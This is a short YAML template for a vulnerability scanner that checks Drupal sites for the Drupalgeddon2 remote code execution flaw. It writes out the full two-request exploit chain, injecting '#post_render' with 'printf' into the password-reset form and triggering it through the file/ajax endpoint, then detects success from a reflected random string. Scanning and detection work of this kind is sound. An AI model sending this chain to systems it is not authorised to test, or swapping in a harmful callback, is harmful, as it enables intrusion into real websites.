id: drupal8-drupalgeddon2-rce
single: true
info:
  name: Drupal 7 REST RCE
  risk: High

params:
  - root: "{{.BaseURL}}"
  - rand1: "RandomString(4)"
  - rand2: "RandomString(4)"

requests:
  - method: POST
    redirect: false
    url: >-
      {{.root}}/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{.rand1}}%25%25{{.rand2}}
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Content-Type: application/x-www-form-urlencoded
    body: |
      form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password
    conclusions:
      - RegexSelect("resHeaders", 'name="form_build_id"\\s+value="(?P<buildId>.+?)"')

  # pass session from request 1
  - conditions:
      - ValueOf("buildId") !== ""
    method: POST
    redirect: false
    url: >-
      {{.root}}/?q=file%2Fajax%2Fname%2F%23value%2F{{.buildId}}
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Content-Type: application/x-www-form-urlencoded
    body: |
      form_build_id={{.buildId}}
    detections:
      - >-
        StatusCode() == 200 && StringSearch("body", "{{.rand1}}%{{.rand2}}")

reference:
  - links:
    - https://github.com/dreadlocked/Drupalgeddon2
    - https://dl.packetstormsecurity.net/1902-exploits/drupalrest-exec.txt
